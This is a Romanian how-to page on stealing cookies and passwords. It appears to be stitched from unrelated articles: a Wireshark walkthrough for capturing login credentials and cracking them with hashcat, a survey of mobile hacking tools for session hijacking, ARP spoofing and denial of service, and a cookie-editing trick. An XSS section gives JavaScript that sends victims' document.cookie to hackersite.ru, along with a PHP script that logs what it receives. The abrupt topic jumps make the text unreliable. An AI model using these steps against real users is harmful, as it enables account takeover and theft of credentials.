Acasă - Pentru incepatori
Programe pentru furtul cookie-urilor prin IP. Modalități de a fura biscuiți

Mulți utilizatori nu realizează că completând un login și o parolă atunci când se înregistrează sau se autorizează pe o resursă de Internet închisă și apăsând ENTER, aceste date pot fi ușor interceptate. Foarte des sunt transmise prin rețea într-o formă nesecurizată. Prin urmare, dacă site-ul la care încercați să vă conectați folosește protocolul HTTP, atunci este foarte ușor să captați acest trafic și să îl analizați cu folosind Wireshark apoi, folosind filtre și programe speciale, găsiți și decriptați parola.

Cel mai bun loc pentru a intercepta parolele este nucleul rețelei, unde traficul tuturor utilizatorilor merge către resurse închise (de exemplu, mail) sau în fața routerului pentru a accesa Internetul, la înregistrarea pe resurse externe. Am instalat o oglindă și suntem gata să ne simțim ca un hacker.

Pasul 1. Instalați și lansați Wireshark pentru a capta traficul

Uneori, pentru a face acest lucru, este suficient să selectăm doar interfața prin care intenționăm să captăm trafic și să facem clic pe butonul Start. În cazul nostru, facem captură printr-o rețea fără fir.

Captarea traficului a început.

Pasul 2. Filtrarea traficului POST capturat

Deschidem browserul și încercăm să ne conectăm la o resursă folosind un nume de utilizator și o parolă. Odată ce procesul de autorizare este încheiat și site-ul este deschis, nu mai captăm trafic în Wireshark. Apoi, deschideți analizorul de protocol și vedeți un număr mare de pachete. În acest moment, majoritatea profesioniștilor IT renunță pentru că nu știu ce să facă în continuare. Dar cunoaștem și suntem interesați de pachetele specifice care conțin date POST, care sunt generate pe mașina noastră locală la completarea unui formular pe ecran și trimise către server la distanță când faceți clic pe butonul „Autentificare” sau „Autorizare” din browser.

Introducem un filtru special în fereastră pentru a afișa pachetele capturate: http.cerere.metoda == “POST"

Și vedem, în loc de mii de pachete, doar unul cu datele pe care le căutăm.

Pasul 3. Găsiți numele și parola utilizatorului

Faceți rapid clic dreapta și selectați elementul din meniu Urmărește TCP Steam


După aceasta, textul va apărea într-o nouă fereastră care restabilește conținutul paginii în cod. Să găsim câmpurile „parolă” și „utilizator”, care corespund parolei și numelui de utilizator. În unele cazuri, ambele câmpuri vor fi ușor de citit și nici măcar criptate, dar dacă încercăm să captăm trafic atunci când accesăm resurse foarte cunoscute precum Mail.ru, Facebook, Vkontakte etc., atunci parola va fi criptată:

HTTP/1.1 302 găsit

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRO STP IND DEM"

Set-Cookie: parola= ; expiră=Joi, 07-Nov-2024 23:52:21 GMT; cale=/

Locație: loggedin.php

Lungimea conținutului: 0

Conexiune: aproape

Tip de conținut: text/html; set de caractere=UTF-8

Astfel, in cazul nostru:

Nume de utilizator: networkguru

Parolă:

Pasul 4. Determinați tipul de codificare pentru a decripta parola

De exemplu, accesați site-ul web http://www.onlinehashcrack.com/hash-identification.php#res și introduceți parola noastră în fereastra de identificare. Mi s-a dat o listă de protocoale de codificare în ordinea priorității:

Pasul 5. Decriptarea parolei utilizatorului

Pe în această etapă putem folosi utilitarul hashcat:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

La ieșire am primit o parolă decriptată: simplepassword

Astfel, cu ajutorul Wireshark nu putem doar să rezolvăm problemele de funcționare a aplicațiilor și serviciilor, ci și să ne încercăm ca un hacker, interceptând parolele pe care utilizatorii le introduc în formularele web. De asemenea, puteți afla parolele pentru căsuțele poștale ale utilizatorilor folosind filtre simple pentru afișare:

  • Protocolul POP și filtrul arată astfel: pop.request.command == „USER” || pop.request.command == „PASS”
  • Protocolul și filtrul IMAP vor fi: imap.request conține „login”
  • Protocolul SMTPși va trebui să introduceți următorul filtru: smtp.req.command == „AUTH”

și utilități mai serioase pentru decriptarea protocolului de codare.

Pasul 6: Ce se întâmplă dacă traficul este criptat și folosește HTTPS?

Există mai multe opțiuni pentru a răspunde la această întrebare.

Opțiunea 1. Conectați-vă când conexiunea dintre utilizator și server este întreruptă și captați traficul în momentul în care se stabilește conexiunea (SSL Handshake). Când se stabilește o conexiune, cheia de sesiune poate fi interceptată.

Opțiunea 2: puteți decripta traficul HTTPS folosind fișierul jurnal cu cheia de sesiune înregistrat de Firefox sau Chrome. Pentru a face acest lucru, browserul trebuie configurat să scrie aceste chei de criptare într-un fișier jurnal (exemplu bazat pe FireFox) și ar trebui să primiți acel fișier jurnal. În esență, trebuie să furați fișierul cheie de sesiune din hard disk alt utilizator (ceea ce este ilegal). Ei bine, atunci captează traficul și folosește cheia rezultată pentru a-l decripta.

Clarificare. Vorbim despre browserul web al unei persoane a cărei parolă încearcă să o fure. Dacă ne referim la decriptarea propriului trafic HTTPS și dorim să exersăm, atunci această strategie va funcționa. Dacă încercați să decriptați traficul HTTPS al altor utilizatori fără acces la computerele lor, acest lucru nu va funcționa - adică atât criptare, cât și confidențialitate.

După ce primiți cheile conform opțiunii 1 sau 2, trebuie să le înregistrați în WireShark:

  1. Accesați meniul Editare - Preferințe - Protocoale - SSL.
  2. Setați indicatorul „Reasamblați înregistrările SSL care acoperă mai multe segmente TCP”.
  3. „Lista de chei RSA” și faceți clic pe Editare.
  4. Introduceți datele în toate câmpurile și scrieți calea în fișier cu cheia

„Un smartphone cu instrumente de hacking? Nu există așa ceva”, v-am fi spus recent. A fost posibilă lansarea unora dintre instrumentele obișnuite pentru implementarea atacurilor doar asupra unor Maemo. Acum, multe instrumente familiare au fost portate pe iOS și Android, iar unele instrumente de hack-uri au fost special scrise pentru mediul mobil. Poate un smartphone să înlocuiască un laptop în testele de penetrare? Am decis să verificăm.

ANDROID

Android este o platformă populară nu numai pentru simplii muritori, ci și pentru oamenii potriviți. Numărul de ][-utilități utile aici este pur și simplu în afara graficelor. Pentru aceasta, putem mulțumi rădăcinilor UNIX ale sistemului - acest lucru a simplificat foarte mult portarea multor instrumente pe Android. Din păcate, Google nu permite accesul unora dintre ele în Play Store, așa că va trebui să instalați manual APK-ul corespunzător. De asemenea, unele utilitare necesită acces maxim la sistem (de exemplu, firewall-ul iptables), așa că ar trebui să aveți grijă de accesul root în avans. Fiecare producător folosește aici propria tehnologie, dar găsirea instrucțiunilor necesare este destul de ușoară. Un set bun de HOWTO-uri a fost creat de resursa LifeHacker (bit.ly/eWgDlu). Cu toate acestea, dacă nu ați putut găsi un model aici, forumul XDA-Developers (www.xda-developers.com) vine întotdeauna în ajutor, unde puteți găsi diverse informații despre aproape orice model de telefon Android. Într-un fel sau altul, unele dintre utilitățile descrise mai jos vor funcționa fără acces root.

Manager de pachete

BotBrew Să începem revizuirea cu un manager de pachete neobișnuit. Dezvoltatorii îl numesc „utilități pentru superutilizatori”, iar acest lucru nu este departe de adevăr. După instalarea BotBrew, primiți un depozit din care puteți descărca un număr mare de instrumente familiare compilate pentru Android. Printre acestea: interprete Python și Ruby pentru rularea a numeroase instrumente care sunt scrise în ele, un sniffer tcpdump și un scanner Nmap pentru analiza rețelei, Git și Subversion pentru lucrul cu sisteme de control al versiunilor și multe altele.

Scanere de rețea

PIPS Un smartphone discret care, spre deosebire de laptop, se potrivește cu ușurință în buzunar și nu trezește niciodată suspiciuni, poate fi util pentru explorarea rețelei. Am spus deja mai sus cum puteți instala Nmap, dar există o altă opțiune. PIPS este un port al scanerului Nmap adaptat special pentru Android, deși unul neoficial. Aceasta înseamnă că puteți găsi rapid dispozitive active în rețea, să le determinați sistemul de operare folosind opțiunile de amprentare, să efectuați o scanare a portului - pe scurt, să faceți tot ceea ce este capabil Nmap. Fing Există două probleme cu utilizarea Nmap, în ciuda puterii sale. În primul rând, parametrii pentru scanare sunt transmisi prin taste de lansare, pe care nu numai că trebuie să le cunoașteți, dar și să le puteți introduce cu incomod tastatură mobilă. Și în al doilea rând, rezultatele scanării în ieșirea consolei nu sunt atât de clare pe cât ne-am dori. Scannerul Fing nu are aceste neajunsuri; scanează foarte repede rețeaua, face amprenta și apoi afișează într-o formă clară o listă a tuturor dispozitivelor disponibile, împărțindu-le după tip (router, desktop, iPhone etc.). În același timp, pentru fiecare gazdă puteți vizualiza rapid o listă de porturi deschise. Mai mult, chiar de aici te poți conecta, să zicem, la FTP, folosind clientul FTP instalat în sistem - foarte convenabil. NetAudit Când vine vorba de analiza unei anumite gazde, utilitarul NetAudit poate fi indispensabil. Funcționează pe orice dispozitiv Android (chiar și fără rădăcină) și vă permite nu numai să identificați rapid dispozitivele din rețea, ci și să le examinați folosind o bază de date mare de amprente pentru a identifica sistem de operare, precum și sistemele CMS utilizate pe serverul web. Acum există peste 3.000 de amprente digitale în baza de date. Instrumente net Dacă, dimpotrivă, trebuie să lucrați la un nivel inferior și să examinați cu atenție funcționarea rețelei, atunci nu vă puteți descurca fără Net Tools. Este indispensabil la serviciu administrator de sistem un set de utilități care vă permite să diagnosticați complet funcționarea rețelei la care este conectat dispozitivul. Pachetul conține mai mult de 15 tipuri diferite de programe, cum ar fi ping, traceroute, arp, dns, netstat, route.

Manipularea traficului

Rechin pentru rădăcină Sniffer-ul bazat pe tcpdump înregistrează sincer toate datele într-un fișier pcap, care poate fi apoi studiat folosind utilități familiare precum Wireshark sau Network Miner. Deoarece nu sunt implementate capacități pentru atacurile MITM, este mai degrabă un instrument pentru analiza traficului dvs. De exemplu, aceasta este o modalitate excelentă de a studia ce programe instalate pe dispozitivul dvs. din depozite dubioase transmit. FaceNiff Dacă vorbim de aplicații de luptă pentru Android, atunci una dintre cele mai senzaționale este FaceNiff, care implementează interceptarea și injectarea în sesiunile web interceptate. Descărcând pachetul APK cu programul, puteți rula acest instrument de hack pe aproape orice smartphone Android și, prin conectarea la o rețea fără fir, puteți intercepta conturi ale unei varietăți de servicii: Facebook, Twitter, VKontakte și așa mai departe - mai mult de zece în total. Deturnarea sesiunii este efectuată utilizând atacul de falsificare ARP, dar atacul este posibil numai pe conexiuni neprotejate (FaceNiff nu poate intra în traficul SSL). Pentru a reduce fluxul de scriptdis, autorul a limitat numărul maxim de sesiuni la trei - atunci trebuie să contactați dezvoltatorul pentru un cod special de activare. DroidSheep Dacă creatorul FaceNiff vrea bani pentru a-l folosi, atunci DroidSheep este un instrument complet gratuit, cu aceeași funcționalitate. Adevărat, nu veți găsi kitul de distribuție pe site-ul oficial (acest lucru se datorează legilor dure ale Germaniei privind utilitățile de securitate), dar poate fi găsit pe Internet fără probleme. Sarcina principală a utilitarului este de a intercepta sesiunile web ale utilizatorilor populare rețelele sociale, implementat folosind același ARP Spoofing. Dar cu conexiuni sigure probleme: la fel ca FaceNiff, DroidSheep refuză categoric să lucreze cu protocolul HTTPS. Spoofer de rețea Acest utilitar demonstrează și nesiguranța rețelelor wireless deschise, dar la un nivel ușor diferit. Nu interceptează sesiunile utilizatorilor, dar permite traficului HTTP să treacă prin el însuși folosind un atac de falsificare, efectuând manipulări specificate cu acesta. Pornind de la farse obișnuite (înlocuirea tuturor pozelor de pe site cu fețe de troll, răsturnarea tuturor imaginilor sau, să zicem, înlocuirea rezultatelor Google) și terminând cu atacuri de tip phishing, când utilizatorului i se oferă pagini false ale unor servicii atât de populare precum facebook.com, linkedin.com, vkontakte.ru și multe altele. Anti (Android Network Toolkit de la zImperium LTD)
Dacă întrebați care utilitar de hack pentru Android este cel mai puternic, atunci Anti probabil nu are concurenți. Aceasta este o adevărată combinație de hacker. Sarcina principală a programului este de a scana perimetrul rețelei. În continuare, intră în joc diverse module, cu ajutorul cărora este implementat un întreg arsenal: interceptarea traficului, efectuarea de atacuri MITM și exploatarea vulnerabilităților găsite. Adevărat, există și dezavantaje. Primul lucru care vă atrage atenția este că exploatarea vulnerabilităților se realizează numai de pe serverul central de programe, care se află pe Internet, drept urmare puteți uita de ținte care nu au o adresă IP externă.

Tunnel de trafic

Comandant total Bine cunoscut manager de fișiere acum pe smartphone-uri! Ca și în versiunea desktop, există un sistem de pluginuri pentru conectarea la diferite directoare de rețea, precum și un mod canonic cu două panouri - mai ales convenabil pe tablete. Tunelul SSH Bine, dar cum puteți asigura securitatea datelor dvs. care sunt transmise printr-o rețea fără fir deschisă? Pe lângă VPN, pe care Android îl acceptă imediat, puteți crea un tunel SSH. În acest scop, există un minunat utilitar SSH Tunnel, care vă permite să direcționați traficul aplicațiilor selectate sau întregului sistem în ansamblu printr-un server SSH la distanță. ProxyDroid Este adesea necesar să trimiteți trafic printr-un proxy sau SOX și, în acest caz, ProxyDroid vă va ajuta. Este simplu: alegi ce trafic de aplicație vrei tunel și specificați un proxy (HTTP/HTTPS/SOCKS4/SOCKS5 sunt acceptate). Dacă este necesară autorizarea, ProxyDroid acceptă și acest lucru. Apropo, configurația poate fi legată de un anumit rețea fără fir, după ce a făcut setări diferite pentru fiecare dintre ei.

Rețele fără fir

Analizor Wifi Managerul de rețea fără fir încorporat nu este foarte informativ. Dacă aveți nevoie să obțineți rapid o imagine completă a punctelor de acces din apropiere, atunci utilitarul Wifi Analyzer este o alegere excelentă. Nu numai că va afișa toate punctele de acces din apropiere, dar va afișa și canalul pe care operează, adresa lor MAC și, cel mai important, tipul de criptare utilizat (după ce am văzut literele râvnite „WEP”, putem presupune că accesul la este asigurată o rețea securizată). În plus, utilitarul este ideal dacă trebuie să găsiți unde este localizat fizic punctul de acces dorit, datorită unui indicator vizual de putere a semnalului. WiFiKill Acest utilitar, după cum afirmă dezvoltatorul său, poate fi util atunci când rețeaua wireless este plină la capacitate maximă cu clienți care folosesc întregul canal și tocmai în acest moment aveți nevoie conexiune bunași conexiune stabilă. WiFiKill vă permite să deconectați clienții de la Internet fie selectiv, fie pe baza unui criteriu specific (de exemplu, este posibil să vă bateți joc de toți membrii Yabloko). Programul efectuează pur și simplu un atac de falsificare ARP și redirecționează toți clienții către ei înșiși. Acest algoritm este prost simplu implementat pe baza iptables. Acesta este panoul de control pentru rețelele fără fir de tip fast food :).

Auditul aplicației web

Generator de interogări HTTP Manipularea solicitărilor HTTP de la un computer este o simplă simplă, există un număr mare de utilitare și pluginuri pentru browser. În cazul unui smartphone, totul este puțin mai complicat. HTTP Query Builder vă va ajuta să trimiteți o solicitare HTTP personalizată cu parametrii de care aveți nevoie, de exemplu, cookie-ul dorit sau un User-Agent modificat. Rezultatul solicitării va fi afișat într-un browser standard. Router Brute Force ADS 2 Dacă site-ul este protejat prin parolă utilizând Autentificarea de acces de bază, atunci îi puteți verifica fiabilitatea utilizând utilitarul Router Brute Force ADS 2. utilizat împotriva oricărei alte resurse cu protecție similară . Utilitatea funcționează, dar este clar brută. De exemplu, dezvoltatorul nu prevede forța brută, ci doar forța brută folosind un dicționar. AndDOSid Cu siguranță ați auzit despre un program atât de senzațional pentru dezactivarea serverelor web precum Slowloris. Principiul funcționării sale este de a crea și de a menține numărul maxim de conexiuni cu un server web la distanță, împiedicând astfel noi clienți să se conecteze la acesta. Deci, AnDOSid este un analog al lui Slowloris chiar pe dispozitivul tău Android! Vă spun un secret, două sute de conexiuni sunt suficiente pentru a oferi muncă instabilă unul din patru site-uri web care rulează un server web Apache. Și toate acestea - de pe telefonul tău!

Diverse utilitati

Codifica Când lucrați cu multe aplicații web și analizați logica acestora, este destul de comun să întâlniți date transmise în formă codificată, și anume Base64. Codificarea vă va ajuta să decodați aceste date și să vedeți exact ce este stocat în ele. Poate că, înlocuind ghilimele, codificându-le înapoi în Base64 și înlocuindu-le în adresa URL a site-ului pe care îl cercetați, veți obține mult râvnita eroare de interogare a bazei de date. HexEditor Dacă este necesar editor hex, atunci este disponibil și pentru Android. Cu HexEditor puteți edita orice fișier, inclusiv fișierele de sistem, dacă ridicați drepturile programului la superutilizator. Un înlocuitor excelent pentru un editor de text standard, permițându-vă să găsiți cu ușurință fragmentul de text dorit și să îl schimbați.

Acces de la distanță

ConnectBot Accesat la gazdă la distanță, trebuie să-l poți folosi. Și pentru asta avem nevoie de clienți. Să începem cu SSH, unde ConnectBot este deja standardul de facto. Pe lângă asta interfață ușor de utilizat, oferă posibilitatea de a organiza tuneluri securizate prin conexiuni SSH. PocketCloud Remote RDP/VNC Un program util care vă permite să vă conectați la un desktop la distanță prin servicii RDP sau VNC. Sunt foarte bucuros că aceștia sunt doi clienți în unul, nu este nevoie să folosiți instrumente diferite pentru RDP și VNC. Browser SNMP MIB Scris special pentru browser Android MIB, cu care puteți gestiona dispozitivele de rețea prin protocol SNMP. Poate fi util pentru dezvoltarea unui vector de atac pe diverse routere, deoarece șirul comunității standard (cu alte cuvinte, o parolă de acces) pentru management prin SNMP nu a fost încă anulat.

iOS

Platforma iOS nu este mai puțin populară printre dezvoltatorii de utilitare de securitate. Dar dacă în cazul Drepturi AndroidÎn timp ce root era necesar doar pentru unele aplicații, jailbreak-ul este aproape întotdeauna necesar pe dispozitivele Apple. Din fericire, chiar și pentru cel mai recent firmware iDevices (5.1.1) există deja un instrument de jailbreak. Pe lângă accesul complet, veți obține și un manager de aplicații alternativ, Cydia, care conține deja multe utilități.

Lucrul cu sistemul

MobileTerminal Primul lucru cu care vreau să încep este să instalez terminalul. Din motive evidente, nu este inclus în livrarea standard a sistemului de operare mobil, dar vom avea nevoie de el pentru a rula utilități de consolă, despre care vom discuta în continuare. Cea mai bună implementare a unui emulator de terminal este MobileTerminal - acceptă mai multe terminale, gesturi de control (de exemplu, pentru trimiterea Control-C) și este în general impresionant în atenția sa. iSSH Încă unul, mai mult varianta dificila obțineți acces la consola dispozitivului - instalați OpenSSH pe ea (acest lucru se face prin Cydia) și conectați-vă la ea local printr-un client SSH. Dacă utilizați clientul potrivit, cum ar fi iSSH, care are un control uimitor al ecranului tactil, atunci această metodă este chiar mai convenabilă decât utilizarea MobileTerminal.

Interceptarea datelor

Pirni & Pirni Pro Acum că aveți acces la consolă, puteți încerca utilitățile. Să începem cu Pirni, care a intrat în istorie ca un sniffer cu drepturi depline pentru iOS. Din păcate, modulul Wi-Fi limitat structural încorporat în dispozitiv nu poate fi comutat în modul promiscuu necesar pentru interceptarea normală a datelor. Deci, pentru a intercepta datele, se folosește spoofingul ARP clasic, cu ajutorul căruia tot traficul este trecut prin dispozitivul însuși. Versiunea standard a utilitarului este lansată din consolă, unde, pe lângă parametrii de atac MITM, este specificat și numele fișierului PCAP, în care este înregistrat tot traficul. Utilitarul are o versiune mai avansată - Pirni Pro, care se mândrește cu o interfață grafică. Mai mult decât atât, poate analiza traficul HTTP din mers și chiar poate extrage automat date interesante de acolo (de exemplu, date de conectare și parole), folosind expresii regulate, care sunt setate în setări. Intercepter-NG (ediție de consolă) Cunoscutul sniffer Intercepter-NG, despre care am scris de mai multe ori, a avut recent o versiune pentru consola. După cum spune autorul, cea mai mare parte a codului este scris în pur ANSI C, care se comportă la fel în aproape orice mediu, așa că versiunea pentru consolă a funcționat de la bun început atât pe desktop Windows, Linux și BSD, cât și pe platforme mobile, inclusiv iOS și Android. Versiunea de consolă implementează deja preluarea parolelor transmise printr-o varietate de protocoale, interceptarea mesajelor instant messenger (ICQ/Jabber și multe altele), precum și recuperarea fișierelor din trafic (HTTP/FTP/IMAP/POP3/SMTP/SMB). În același timp, sunt disponibile funcții de scanare în rețea și ARP Poison de înaltă calitate. Pentru o funcționare corectă, trebuie mai întâi să instalați pachetul libpcap prin Cydia (nu uitați să activați pachetele de dezvoltare din setări). Toate instrucțiunile de pornire se rezumă la setarea drepturilor corecte: chmod +x intercepter_ios. În continuare, dacă rulați sniffer-ul fără parametri, va apărea o interfață interactivă clară Itercepter, permițându-vă să lansați orice atac. Ettercap-NG Este greu de crezut, dar acest instrument sofisticat pentru implementarea atacurilor MITM a fost în sfârșit portat pe iOS. După o muncă enormă, am reușit să facem un port mobil cu drepturi depline. Pentru a vă salva de a dansa cu o tamburină în jurul dependențelor în timpul autocompilării, este mai bine să instalați un pachet deja construit folosind Cydia, după ce adăugați theworm.altervista.org/cydia (depozitul TWRepo) ca sursă de date. ÎN inclusși utilitarul etterlog, care ajută la extragerea diferitelor tipuri de informații utile din depozitul de trafic colectat (de exemplu, conturi de acces FTP).

Analiza rețelei fără fir

Analizor WiFi Pe vechi versiuni iOS meșterii au fugit aircrack și ar putea sparge cheia WEP, dar am verificat: programul nu funcționează pe dispozitive noi. Prin urmare, pentru a studia Wi-Fi, va trebui să ne mulțumim doar cu scanere Wi-Fi. Analizor WiFi Analizează și afișează informații despre toate rețelele 802.11 disponibile în jur, inclusiv informații despre SSID, canale, furnizori, adrese MAC și tipuri de criptare. Utilitarul construiește grafice vizuale în timp real pe baza datelor prezente în aer. Cu un astfel de program este ușor să găsiți locația fizică a punctului dacă o uitați brusc și, de exemplu, uitați-vă la PIN-ul WPS, care poate fi util pentru conectare.

Scanere de rețea

Scany Ce program folosește orice pentester de oriunde în lume, indiferent de scopuri și obiective? Scanner de rețea. Și în cazul iOS, acesta va fi cel mai probabil cel mai puternic set de instrumente Scany. Datorită unui set de utilități încorporate, puteți obține rapid o imagine detaliată a dispozitive de rețea ah și, de exemplu, porturi deschise. În plus, pachetul include utilități de testare a rețelei, cum ar fi ping, traceroute, nslookup. Fing Cu toate acestea, mulți oameni preferă Fing. Scannerul are o funcționalitate destul de simplă și limitată, dar este destul de suficient pentru prima cunoaștere cu rețeaua, să zicem, a unei cantine :). Rezultatele afișează informații despre serviciile disponibile pe mașini la distanță, adrese MAC și nume de gazdă conectate la rețeaua scanată. Nikto S-ar părea că toată lumea a uitat de Nikto, dar de ce? La urma urmei, puteți instala cu ușurință acest scaner de vulnerabilități web, scris într-un limbaj de script (și anume Perl), prin Cydia. Aceasta înseamnă că îl poți lansa cu ușurință pe dispozitivul tău jailbreak de pe terminal. Nikto va fi bucuros să vă ofere Informații suplimentare pe resursa web testată. În plus, puteți adăuga propriile semnături de căutare la baza sa de cunoștințe cu propriile mâini. sqlmap Aceasta instrument puternic pentru a exploata automat vulnerabilitățile SQL, este scris în Python, ceea ce înseamnă că odată ce ai instalat interpretul, îl poți folosi cu ușurință direct de pe dispozitivul tău mobil.

Telecomanda

Scanare SNMP Multe dispozitive de rețea (inclusiv routere scumpe) sunt gestionate folosind protocolul SNMP. Acest utilitar vă permite să scanați subrețele pentru servicii SNMP disponibile cu valori precunoscute ale șirurilor comunitare (cu alte cuvinte, parole standard). Rețineți că căutarea serviciilor SNMP cu șiruri comunitare standard (publice/private) în încercarea de a obține acces la managementul dispozitivelor este o parte integrantă a oricărui test de penetrare, împreună cu identificarea perimetrului în sine și identificarea serviciilor. iTap mobil RDP / iTap mobil VNC Două utilitare de la același producător sunt proiectate pentru a se conecta la un desktop de la distanță folosind protocoalele RDP și VNC. Utilități similare în App Store Sunt multe, dar acestea sunt cele care sunt deosebit de convenabile de utilizat.

Recuperarea parolei

Hidra Legendarul program care ajută milioane de hackeri din întreaga lume să-și „amintească” parola a fost portat pe iOS. Acum puteți căuta parole pentru servicii precum HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 și multe altele direct de pe iPhone. Adevărat, pentru un atac mai eficient, este mai bine să vă aprovizionați cu dicționare bune de forță brută. Treci Mule Toată lumea știe de prima mână vulnerabilitatea utilizării parole standard. Pass Mule este un fel de director care conține tot felul de login-uri și parole standard pentru dispozitivele de rețea. Acestea sunt organizate convenabil după numele furnizorului, produs și model, așa că găsirea celui de care aveți nevoie nu va fi dificilă. Programul este mai degrabă conceput pentru a economisi timp la căutarea unui manual pentru router, autentificarea standard și parola pe care trebuie să le aflați.

Exploatarea vulnerabilităților

Metasploit
Este greu de imaginat un utilitar mai mult de hacking decât Metasploit și asta este ceea ce încheie recenzia noastră de astăzi. Metasploit este un pachet de diverse instrumente a căror sarcină principală este exploatarea vulnerabilităților în software. Imaginați-vă: aproximativ 1000 de exploatări de încredere, dovedite și necesare în viața de zi cu zi a unui pentester - chiar pe smartphone-ul tău! Cu ajutorul unui astfel de instrument, vă puteți stabili cu adevărat în orice rețea. Metasploit nu vă permite doar să exploatați defectele aplicațiilor server - sunt disponibile și instrumente pentru a ataca aplicațiile client (de exemplu, prin modulul Browser Autopwn, atunci când o sarcină utilă de luptă este inserată în traficul clientului). Aici trebuie spus că versiunea mobilă Nu există un set de instrumente, dar puteți instala un pachet standard pe un dispozitiv Apple folosind .

Ce este un cookie?

Există un mecanism care permite serverului http să salveze unele informații text pe computerul utilizatorului și apoi să le acceseze. Aceste informații numit cookie. În esență, fiecare cookie este o pereche: numele unui parametru și valoarea acestuia. Fiecărui cookie i se atribuie, de asemenea, domeniul căruia îi aparține. Din motive de securitate, în toate browserele serverului http îi este permis doar să acceseze cookie-ul domeniului său. În plus, cookie-urile pot avea o dată de expirare, caz în care vor fi stocate pe computer până la această dată, chiar dacă închideți toate ferestrele browserului.


De ce sunt importante cookie-urile?

Toate sistemele multi-utilizator folosesc cookie-uri pentru a identifica utilizatorul. Mai precis, conexiunea curentă a utilizatorului la serviciu, sesiune utilizator. Dacă cineva vă recunoaște cookie-urile, se va putea conecta în sistem în numele dvs. Pentru că în momentul prezent foarte puține resurse de Internet verifică modificările adresei IP în timpul unei sesiuni de utilizator.


Cum se schimbă sau se înlocuiește cookie-urile?

Dezvoltatorii de browser nu oferă instrumente încorporate pentru editarea cookie-urilor. Dar te poți descurca cu un blocnotes obișnuit.


Pasul 1: creați fișier text cu text

Windows Registry Editor versiunea 5.00



@="C:\\IE_ext.htm"

Salvați-l sub numele IE_ext.reg

Pasul 2: Folosind fișierul creat, adăugați modificări la registrul Windows.

Pasul 3: creați un fișier text cu text

< script language="javascript">
external.menuArguments.clipboardData.setData(„Text” , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);


Salvați-l sub numele C:\IE_ext.htm

Pasul 4: Mergem pe site-ul web care ne interesează.

Pasul 5: Faceți clic dreapta pe un spațiu gol din pagină și selectați elementul de meniu „Lucrul cu cookie-uri”. Permite accesul la clipboard. Dvs cookie de asta site-ul web. Puteți să le introduceți blocnotesul și să aruncați o privire.


Pasul 6: Pentru a schimba unele cookie-uri, editați fișierul C:\IE_ext.htm, înlocuind testnameîn numele cookie-ului, valoare de test- asupra semnificației sale, testdomain.ru– la domeniul site-ului. Dacă este necesar, adăugați mai multe linii similare. Pentru a ușura controlul, am adăugat la script rezultatul cookie-urilor curente înainte și după modificare: alert(external.menuArguments.document.cookie);

Pasul 7: Efectuați din nou Pasul 5, apoi reîmprospătați pagina.

Concluzie: vom accesa această resursă de internet cu cookie-uri actualizate.

Cum să furi cookie-uri folosind JavaScript?

Dacă un atacator reușește să găsească o oportunitate de a executa un script JavaScript arbitrar pe computerul victimei, atunci poate citi cookie-urile curente foarte ușor. Exemplu:


var str= document.cookie;

Dar va putea să le transfere pe site-ul său, deoarece, așa cum am subliniat mai devreme, un script JavaScript nu va putea accesa un site situat pe un alt domeniu fără o confirmare suplimentară? Se pare că un script JavaScript poate încărca orice imagine aflată pe orice server http. În același timp, transferați orice informație text din solicitarea de descărcare către această imagine. Exemplu: http://hackersite.ru/xss.jpg?text_info Deci, dacă rulați acest cod:

var img= imagine nouă();

img.src= „http://hackersite.ru/xss.jpg?”+ encodeURI(document.cookie);


apoi cookie-ul va ajunge în cererea de a descărca „imaginea” și va „merge” la atacator.

Cum să gestionați astfel de solicitări de descărcare a unei „imagine”?

Un atacator trebuie doar să găsească o găzduire cu suport PHP și să plaseze acolo cod ca acesta:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Apoi toți parametrii de solicitare pentru acest script vor fi salvați în fișier log.txt. Tot ce rămâne este să înlocuim scriptul JavaScript descris anterior http://hackersite.ru/xss.jpg la calea către acest script php.


Concluzie

Am arătat doar cel mai simplu mod de a exploata vulnerabilitățile XSS. Dar acest lucru demonstrează că prezența a cel puțin unei astfel de vulnerabilități pe un site de internet multi-utilizator poate permite unui atacator să-și folosească resursele în numele tău.

Bună, acest articol scurt, mai degrabă chiar scurtă descriere Aș vrea să mă dedic mod simplu interceptați cookie-urile în rețele wi-fi. Nu vă voi spune aici ce sunt cookie-urile și de ce sunt necesare, dacă o persoană este interesată să intercepteze „produse de panificație”; într-o rețea fără fir, cred că ar trebui să știe ce este și de ce are nevoie. Voi spune doar un lucru: folosind aceste fișiere puteți obține acces la conturile altor persoane de pe diferite site-uri care necesită ca utilizatorii să treacă printr-un proces de autentificare (De exemplu, mail.ru, vkontakte.ru etc.).

Deci, să începem. În primul rând, trebuie să găsim rețeaua wireless în sine, cu un gateway de acces la Internet deschis și este de dorit ca această rețea să aibă destul de mulți clienți. De exemplu, orice rețea din marile centre comerciale, aeroporturi, diverse cafenele este potrivită în astfel de locuri pe care oamenii le folosesc de obicei acces wi-fi pe Internet, pentru citirea e-mailurilor, verificarea conturilor pe diverse site-uri de întâlniri, vizualizarea LJ și diverse forumuri. Totul este exact ceea ce avem nevoie. După ce am decis asupra alegerii locației rețelei, după ce am studiat anumite ore ale numărului maxim de clienți, să trecem direct la operațiunile de luptă. Pentru asta avem nevoie de un laptop cu adaptor wi-fi, și un anumit set de programe. In cazul meu, am folosit laptop Acer Aspire 3610, card wi-fi client D-Link DWL G650 și sistemul de operare BackTrack3 instalat.

Vă sfătuiesc să utilizați acest sistem de operare, deoarece include deja întregul set de programe de care ați putea avea nevoie, iar cel mai important avantaj este că nu trebuie să instalați Backtrack pe dvs. hard disk, puteți porni acest sistem de operare direct de pe un CD sau o unitate flash.

